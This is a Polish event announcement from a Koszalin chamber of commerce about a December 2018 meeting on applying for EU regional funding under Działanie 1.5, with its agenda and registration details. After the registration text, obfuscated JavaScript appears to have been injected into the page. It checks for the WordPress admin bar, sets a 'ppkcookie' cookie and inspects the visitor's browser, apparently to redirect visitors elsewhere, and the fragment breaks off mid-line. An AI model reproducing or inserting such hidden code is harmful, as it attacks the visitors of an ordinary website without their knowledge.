„Spotkanie Informacyjne dotyczące aplikowania o środki europejskie w ramach Działania 1.5 | Północna Izba Gospodarcza w Koszalinie

„Spotkanie Informacyjne dotyczące aplikowania o środki europejskie w ramach Działania 1.5 – Inwestycje przedsiębiorstw wspierające rozwój regionalnych oraz inteligentnych specjalizacji finansowanego z RPOWZ 2014-2020”, które odbędzie się w dniu 17.12.2018 r. Wydziale Zamiejscowym Urzędu Marszałkowskiego Województwa Zachodniopomorskiego w Koszalinie – Al. Monte Cassino 2, Sala konferencyjna.

Zwracamy się z prośbą o umieszczenie „plakatu” (w załączeniu) wraz z informacjami na Państwa stronie internetowej, tablicy informacyjnej itp.

by zachęcić jak największą liczbę osób. Proszę w miarę możliwości o rozesłanie informacji do potencjalnych beneficjentów.

Link do ogłoszenia o spotkaniu informacyjnym: http://rpo.wzp.pl/o-programie/konferencje-i-szkolenia/spotkanie-informacyjne-w-koszalinie-dotyczace-aplikowania-o-fundusze-europejskie-w-ramach-dzialania-15-0

Konkurs 1.5 dedykowany jest następującym inteligentnym specjalizacjom:

  1. a) wielkogabarytowe konstrukcje wodne i lądowe,
  2. b) zaawansowane wyroby metalowe,
  3. c) produkty drzewno-meblarskie
  4. d) opakowania przyjazne środowisku,
  5. e) produkty inżynierii chemicznej i materiałowej,
  6. f) nowoczesne przetwórstwo rolno-spożywcze,
  7. g) multimodalny transport i logistyka,
  8. h) produkty oparte na technologiach informacyjnych.

Minimalna wartość wydatków kwalifikowalnych projektu: 500 000 zł.

Link do ogłoszenia o konkursie na stronie rpo.wzp.pl: http://rpo.wzp.pl/skorzystaj/nabory/15-inwestycje-przedsiebiorstw-wspierajace-rozwoj-regionalnych-specjalizacji-oraz-inteligentnych-specjalizacji-typ-projektu-0

Program spotkania

10:00-10:10   Powitanie uczestników i przedstawienie planu szkolenia.
10:10-10:20   Przedstawienie oferty sieci PIFE.
10:20-11:20   Główne założenia konkursu dla Działania 1.5.
11:20-11:30   Przerwa.
11:45-12:30   Procedura wyboru projektów oraz Wniosek o dofinansowanie dla Działania 1.5 (cz.1).
12:30-12:45   Przerwa.
12:45-13.30   Wniosek o dofinansowanie dla Działania 1.5 (cz.2) / pytania od beneficjentów.

Organizator spotkania:

  • – Lokalny Punkt Informacyjny w Koszalinie, ul. Monte Cassino 2, Koszalin, e-mail: lpi-koszalin@wzp.pl, tel. 94 317 74 07/05/09
  • – Wydział Wdrażania Regionalnego Programu Operacyjnego, ul. Wyszyńskiego 30, 70-203 Szczecin.

Osoby zainteresowane uczestnictwem proszone są o przesłanie e-mailem wypełnionego formularza zgłoszeniowego (w załączeniu do wiadomości)

na adres: lpi-koszalin@wzp.pl do dnia 14 grudnia 2018r., do godz. 12:00. O udziale w spotkaniu decyduje kolejność zgłoszeń. 'toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’http://’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[’push’](c[’shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(’0x7′)][b(’0x8′)](’;’);for(var m=0x0;m